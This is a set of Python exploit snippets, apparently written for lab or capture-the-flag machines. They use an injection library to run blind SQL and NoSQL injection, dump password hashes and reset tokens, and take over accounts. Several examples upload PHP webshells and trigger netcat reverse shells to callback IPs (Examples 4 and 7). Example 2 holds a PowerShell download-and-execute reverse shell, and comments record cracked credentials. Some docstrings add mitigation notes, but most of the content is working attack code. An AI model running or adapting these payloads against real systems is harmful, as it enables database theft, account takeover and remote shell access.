Example #1
def pwn():
    """Lab walkthrough: boolean-based blind SQL injection on a ticket view.

    Wraps the saved HTTP request in ``req-view.txt`` in a ``ya.Transport`` and
    pulls ``staff.password`` row by row with ``ya.boolExfiltrateList``.  The
    commented lines are the author's notes from earlier steps (server version,
    table/column enumeration, previously run queries) and the values they
    returned; they are history, not live code.

    Returns nothing: the exfiltrated list ``r`` is assigned but never printed
    or returned, so the result is only visible through the transport's own
    output (if any).
    """
    # curl 'http://10.10.10.121:3000/GRAPHQL?query=query%7buser%7b%20username%20password%7d%7d'
    # [email protected]:godhelpmeplz
    # sqli in view_tickets_controller.php
    # NOTE(review): pPayload/boolPredicate are defined elsewhere in this file;
    # presumably they embed the query in the injection point and classify the
    # response as true/false — confirm against the helper definitions.
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=boolPredicate,
                     requestPath='req-view.txt')

    # qry = 'select @@version' # 5.7.24-0ubuntu0.16.04.1
    # r = ya.boolExfiltrate(t, qry, 'mysql')

    # users, settings
    # qry = ya.templates['mysql']['select']['tables']
    # ['USER', 'CURRENT_CONNECTIONS', 'TOTAL_CONNECTIONS', 'id', 'salutation', 'fullname', 'email', 'password', 'timezone', 'status']
    # qry = ya.templates['mysql']['select']['columns'].format(table='users')
    # qry = 'select email from users'
    # qry = 'select password from users'
    # [email protected]:c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca
    # [email protected]:ec09fa0d0ba74336ea7fe392869adb198242f15a
    # qry = ya.templates['mysql']['select']['columns'].format(table='staff')
    # ['id', 'username', 'password', 'fullname', 'email', 'login', 'last_login', 'department', 'timezone', 'signature', 'newticket_notification', 'avatar', 'admin', 'status']
    # qry = 'select username from staff'
    qry = 'select password from staff'
    # admin:d318f44739dced66793b1a603028133a76ae680e:Welcome1

    # Detection note: blind exfiltration shows up server-side as a long run of
    # near-identical requests to the same endpoint that differ by one
    # character of the injected condition.  Parameterised queries in the
    # controller named above remove the injection point entirely.
    r = ya.boolExfiltrateList(t, qry, 'mysql')
Example #2
def pwn():
    """Lab walkthrough against an MSSQL-backed application.

    Only the last four lines are live: they build a boolean-based
    ``ya.Transport`` over ``req-verify.txt`` and read ``@@version`` through
    ``ya.boolExfiltrate``.  Everything above is the author's commented-out
    history — an earlier error/response-based transport, table and column
    enumeration, a paged dump of ``_logins``, and a command-execution stage
    (``rce``/``interactiveCli``, defined elsewhere) — kept as notes.

    Returns nothing; the version string is not captured here.
    """
    # t = ya.Transport(payloadProcessor=pPayload, responseProcessor=pResponse, requestPath='request.txt')
    # res = t.send(ya.templates['mssql']['select']['version']) # Microsoft SQL Server 2014 - 12.0.2269.0 (X64)
    # res = t.send(ya.templates['mssql']['select']['isShellEnabled']) # 1
    # res = t.send(ya.templates['mssql']['select']['user']) # web
    # res = t.send(ya.templates['mssql']['select']['database']) # web
    # print(res)

    # idx = 0
    # while True:
    #     # qry = ya.templates['mssql']['select']['tables'] # _logins, TEST1, TMPYU
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='_logins') # _e, _l, _n, _p, _u, id
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='TEST1') # ID, OUT
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='TMPYU') # ID, OUT
    #     qry = 'SELECT _e FROM _logins' # [email protected]
    #     limit = ya.templates['mssql']['util']['limit'].format(count=1, offset=idx)
    #     res = t.send(f'{qry} {limit}')
    #     if res is None: break
    #     print(res)
    #     idx += 1

    # interactiveCli(rce)

    # REMEMBER: python -m http.server 80
    # p = subprocess.Popen('nc -lvp 443'.split(' '))
    # revshell = R"""c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.16/Invoke-PowerShellTcp.ps1'');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 443" """
    # rce(revshell)

    # p.communicate()

    # Hardening note for the notes above: the 'isShellEnabled' probe returned
    # 1, i.e. OS command execution from the database was enabled for the web
    # account.  Running the application DB user without that privilege is
    # what would have stopped the command-execution stage.

    # bool
    # NOTE(review): pBoolPayload is a different payload builder from the
    # pPayload used on the other examples; it is defined elsewhere in the
    # file — presumably it shapes a true/false oracle rather than a data
    # channel.  Confirm before relying on it.
    t = ya.Transport(payloadProcessor=pBoolPayload,
                     predicate=boolPredicate,
                     requestPath='req-verify.txt')
    ya.boolExfiltrate(t, 'SELECT @@version', 'mssql')
Example #3
def rce(cmd):
    """Execute ``cmd`` via the MSSQL helper, then fetch its output.

    ``t.payloadProcessor`` is switched to ``pPayloadStacked`` for the
    ``ya.mssqlShell`` call and back to ``pPayload`` for ``ya.mssqlExfilShell``,
    so the two helpers presumably need different injection shapes (a stacked
    statement for execution, a plain select for reading the result) — confirm
    against the ``pPayload*`` definitions, which are outside this block.

    Note that ``boolPredicate`` is passed as ``responseProcessor`` here, while
    every other example on this page passes it as ``predicate``; the two
    keywords may not be equivalent in ``ya.Transport``.

    Returns nothing; whatever ``mssqlExfilShell`` produces is not captured.
    """
    t = ya.Transport(payloadProcessor=pPayload,
                     responseProcessor=boolPredicate,
                     requestPath='req-view.txt')
    t.payloadProcessor = pPayloadStacked
    ya.mssqlShell(t, cmd)
    t.payloadProcessor = pPayload
    ya.mssqlExfilShell(t)
Example #4
def pwn():
    """Lab walkthrough: time-based blind SQLi to account takeover and a shell.

    Visible flow, in order:

    1. Trigger a password reset for a user, then read that user's reset
       ``token`` from the ``user`` table with a time-based blind oracle
       (``timePredicate``, ``timeBasedDelay=1``).
    2. Submit the token with a chosen password, log in with it.
    3. Upload a PHP file through the item-update form as the product image
       and request it with a ``cmd`` parameter while a local listener runs.

    Each HTTP step is checked only by looking for ``'Oops!'`` in the response
    body; on failure the process exits with status -1 (``exit`` is the
    site builtin — inside a function ``sys.exit``/an exception is the
    conventional form).  The final ``res`` is assigned but never read.

    Mitigation notes, from what the code demonstrates: the reset token is
    recoverable because it is readable through an injectable query and is
    accepted as-is — parameterised queries plus single-use, expiring tokens
    close that path; the upload is accepted with a ``.phar`` name and a PHP
    MIME type and is then served from ``/item/image/``, so the server side
    needs an extension/content-type allowlist and must not execute files
    from the upload directory.

    Returns nothing; ``p.communicate()`` blocks until the listener exits.
    """
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=timePredicate,
                     requestPath='req-view.txt',
                     debug=True)
    # Reuse the transport's own HTTP session so cookies set by the reset and
    # login steps carry over to the later requests.
    s = t.client.session
    res = s.post('http://192.168.0.150/login/resetPassword.php',
                 data={'username': '******'})
    # qry = 'select @@version'
    # 5.7.33-0ubuntu0.18.04.1
    # NOTE(review): the id_level = 1 filter is assumed to select the admin
    # account (the success message below prints 'admin'); not verifiable here.
    qry = 'select token from user where id_level = 1'
    # unaccessable_until_you_change_me, mJAL3qtMatNCDJ0
    newPwd = 'mypassword'
    token = ya.boolExfiltrate(t, qry, 'mysql', timeBasedDelay=1)
    data = {'token': token, 'password': newPwd}
    res = s.post('http://192.168.0.150/login/doChangePassword.php', data=data)
    if 'Oops!' in res.text:
        print('[-] error reseting password')
        exit(-1)
    print(f'[+] login = admin:{newPwd}')
    data = {'username': '******', 'password': newPwd}
    res = s.post('http://192.168.0.150/login/checkLogin.php', data=data)
    if 'Oops!' in res.text:
        print('[-] error login')
        exit(-1)
    print('[+] logged in')
    # Multipart form: every field is sent as a "file" part; only 'image'
    # carries a real (filename, content, content-type) tuple.
    file = {
        'id': '2',
        'id_user': '******',
        'name': 'foo',
        'description': 'bar',
        'price': '1',
        'image':
        ('x.phar', "<?php system($_GET['cmd']); ?>", 'application/x-php')
    }
    res = s.post('http://192.168.0.150/item/updateItem.php', files=file)
    if 'Oops!' in res.text:
        print('[-] error uploading webshell')
        exit(-1)
    print('[+] webshell uploaded')
    # Hard-coded callback address/port of the author's lab host.
    ip = '192.168.0.102'
    port = 5555
    revshell = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {port} >/tmp/f'
    # Listener is started before the triggering request; argv is built from a
    # constant string, so shell=False is used correctly here.
    p = subprocess.Popen(f'nc -lvp {port}'.split(' '))
    res = s.get('http://192.168.0.150/item/image/x.phar',
                params={'cmd': revshell})
    p.communicate()
Example #5
def pwn():
    """Lab walkthrough: time-based blind SQL injection against SQLite.

    Builds a ``ya.Transport`` over ``req.login`` with ``timePredicate`` (the
    boolean variant is kept commented out above it), dumps
    ``users.password`` with ``ya.boolExfiltrateList`` using a two-second
    delay oracle, and prints the resulting list.  Commented lines record the
    earlier enumeration steps (version, tables, ``users`` schema) and a
    recovered hash.

    Returns nothing; output goes to stdout.
    """
    # t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login')
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=timePredicate,
                     requestPath='req.login')

    # qry = ya.templates['sqlite']['select']['version']
    # res = ya.boolExfiltrate(t, qry, 'sqlite')

    # qry = ya.templates['sqlite']['select']['tables']
    # ['users', 'notes', 'bookings', 'sessions']
    # qry = ya.templates['sqlite']['select']['columns'].replace('{table}', 'users')
    # ['CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,active TINYINT(1))']
    # qry = "SELECT username FROM users"
    qry = "SELECT password FROM users"
    # RickA:fdc8cd4cff2c19e0d1022e78481ddf36 (nevergonnagiveyouup)

    # Detection note: a time-based oracle with a fixed 2 s delay produces a
    # bimodal response-time pattern on the login endpoint; that is the
    # signal to alert on if the query itself cannot be parameterised.
    # res = ya.boolExfiltrateList(t, qry, 'sqlite')
    res = ya.boolExfiltrateList(t, qry, 'sqlite', timeBasedDelay=2)

    print(res)
Example #6
def pwn():
    """Lab walkthrough: boolean-based blind SQL injection on a login form.

    Builds a ``ya.Transport`` over ``req.login`` with ``boolPredicate``,
    dumps ``tblMembers.password`` via ``ya.boolExfiltrateList`` for the
    ``'mysql'`` dialect and prints the list.  The commented lines are the
    author's earlier enumeration steps and what they returned (MariaDB
    version, DB user ``root@localhost``, database name, tables, columns).

    Returns nothing; output goes to stdout.
    """
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=boolPredicate,
                     requestPath='req.login')

    # Dialect key into ya.templates; also passed to the exfiltration helper.
    dbms = 'mysql'
    # qry = ya.templates[dbms]['select']['version']
    # 10.0.23-MariaDB
    # qry = ya.templates[dbms]['select']['user']
    # root@localhost
    # qry = ya.templates[dbms]['select']['database']
    # seattle
    # ya.boolExfiltrate(t, qry, dbms)
    # qry = ya.templates[dbms]['select']['tables']
    # ['tblBlogs', 'tblMembers', 'tblProducts']
    # qry = ya.templates[dbms]['select']['columns'].replace('{table}', 'tblMembers')
    # ['id', 'username', 'password', 'session', 'name', 'blog', 'admin']
    qry = 'SELECT password from tblMembers'
    # [email protected]:Assasin1

    # Hardening note from the enumeration above: the web application
    # connects as root@localhost, so any injection point yields full
    # database access; a least-privilege application account limits blast
    # radius even before the injection itself is fixed.
    res = ya.boolExfiltrateList(t, qry, dbms)
    print(res)
Example #7
def pwn():

    t = ya.Transport(
        payloadProcessor=pPayload,
        predicate=boolPredicate,
        requestPath='req-login.txt'
    )
    # qry = 'select @@version'
    # ya.boolExfiltrate(t, qry,'mysql')

    # q = ya.templates['mysql']['select']['tables']
    # users
    # q = ya.templates['mysql']['select']['columns'].format(table='users')
    # ID, username, password, role
    # q = 'SELECT password FROM users'
    # admin, chris
    # 0e462096931906507119562988736854, d4ee02a22fc872e36d9e3751ba72ddc8:juggling
    # ya.boolExfiltrateList(t, q, 'mysql')
    # admin:240610708

    # RUN FTP SERVER WITH shell.php
    # python3 -m pyftpdlib -p21 -w
    ftp = threading.Thread(target=ftpd)
    ftp.daemon = True
    ftp.start()
    s = t.client.session
    s.post('http://10.10.10.73/login.php', {'username':'******','password':'******'})
    res = s.post('http://10.10.10.73/upload.php', {'url':'http://10.10.14.9/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.gif'})
    hit = re.findall('/var/www/html/(.*?);', res.text)[0]
    l = subprocess.Popen('nc -lvp 5555', shell=True)
    params = {'cmd':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 5555 >/tmp/f'}
    try:
        s.get(f'http://10.10.10.73/{hit}/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php', params=params, timeout=0.0001)
    except requests.exceptions.ReadTimeout:
        pass
    l.communicate()    
Example #8
def pwn():
    """Lab walkthrough: character-by-character NoSQL extraction of users, then passwords.

    Step 1 uses the saved request ``req-user.txt`` to recover user names
    over the lowercase alphabet.  Step 2 re-reads ``req-pass.txt`` once per
    user, substitutes the literal ``{user}`` placeholder, swaps the
    transport's HTTP client for one parsed from that text, and recovers each
    password over the printable, non-whitespace character set.

    ``pTmp`` is ``'{guess}'.format`` bound as a partial, i.e. the "query" is
    just the guessed prefix; ``exfilType=ya.BoolExfiltrateType.NOSQL``
    selects the NoSQL strategy in the helper (its semantics are outside this
    page).

    Notes (not changed here): ``passwords`` is never printed or returned, so
    the results are only visible through the helper's own output; the
    ``searchChars`` string is built from a ``set``, so its character order
    differs between interpreter runs (str hash randomisation), which may
    change the number of requests but not the outcome.

    Mitigation note: this oracle works because the login endpoint evaluates
    attacker-controlled query operators against stored fields — rejecting
    non-string values/operators in the username and password parameters
    before they reach the database query removes the channel.

    Returns nothing.
    """
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=boolPredicate,
                     requestPath='req-user.txt')
    pTmp = partial('{guess}'.format)
    users = ya.boolExfiltrateList(t,
                                  pTmp,
                                  'nosql',
                                  searchChars=string.ascii_lowercase,
                                  exfilType=ya.BoolExfiltrateType.NOSQL)
    # users = ['admin', 'mango']
    for user in users:
        with open('req-pass.txt', 'r') as f:
            userFilled = f.read().replace('{user}', user)
            # Replace the transport's client in place so the same predicate
            # and payload processor are reused against the new request.
            t.client = ya.HttpClient.parse(userFilled, debug=True)
            searchChars = ''.join(
                list(set(string.printable) - set(string.whitespace)))
            # pTmp = partial('PREFIX{guess}'.format)
            passwords = ya.boolExfiltrateList(
                t,
                pTmp,
                'nosql',
                searchChars=searchChars,
                exfilType=ya.BoolExfiltrateType.NOSQL)
Example #9
def boolPredicate(res):
    """Oracle for the blind-injection transport.

    Returns ``True`` when the marker text ``'very sorry'`` appears in the
    response body ``res.text``, ``False`` otherwise.  Only ``.text`` is read
    from ``res``.
    """
    return 'very sorry' in res.text


def pPayload(p):
    """Embed a query fragment into the page's fixed boolean-oracle template.

    Strips the first occurrence of the literal ``'SELECT '`` (upper case,
    with trailing space) from ``p`` and places the remainder inside a UNION
    / CASE expression whose branch selects one of two page names; the
    predicate elsewhere in the file then reads which page came back.  If
    ``p`` does not start with ``'SELECT '`` it is embedded unchanged.

    Returns the resulting string.  Hardening note: the whole construction
    relies on the ``id`` value being concatenated into SQL — a parameterised
    query leaves no place for the UNION to attach.
    """
    p = p.replace('SELECT ', '', 1)
    sqli = f'465\' union select case when ({p})=1 then "main" else "contact" end-- -'
    return sqli


# Module-level transport shared by rce() below; constructed at import time,
# which presumably reads 'req-index.txt' from the working directory (ya's
# Transport semantics are not visible on this page — confirm).  useSsl=True
# matches the https:// URLs used in rce().
t = ya.Transport(payloadProcessor=pPayload,
                 predicate=boolPredicate,
                 requestPath='req-index.txt',
                 useSsl=True)


def rce(cmd):
    """Run ``cmd`` on the lab host and print the page that comes back.

    Visible flow: a PHP snippet is stored in the ``webshell`` cookie on the
    module-level transport's session, ``index.php`` is requested so the
    server issues/refreshes ``PHPSESSID``, and the path of the matching PHP
    session file under ``/var/lib/php/sessions/`` is built from that id.
    That path is then sent as a nested injection in ``id`` (a UNION inside a
    UNION, because the application presumably uses the selected value in a
    second query / as a file reference — not verifiable here) together with
    ``cmd`` as a query parameter.

    Notes: ``res.cookies["PHPSESSID"]`` raises ``KeyError`` if the server did
    not set that cookie on this response; the function prints ``res.text``
    and returns nothing.

    Mitigation note: two server-side changes break this chain independently
    — parameterised queries for ``id``, and never resolving file paths from
    database-controlled values (the session directory being readable by the
    web application is what makes the cookie payload reachable).
    """
    t.client.session.cookies['webshell'] = '<?php system($_GET["cmd"]) ?>'
    res = t.client.session.get(
        'https://www.nestedflanders.htb/index.php?id=25')
    wsPath = f'/var/lib/php/sessions/sess_{res.cookies["PHPSESSID"]}'
    params = {
        'id': f'465\' union select "1\' union select \'{wsPath}\'-- -"-- -',
        'cmd': cmd
    }
    res = t.client.session.get('https://www.nestedflanders.htb/index.php',
                               params=params)
    print(res.text)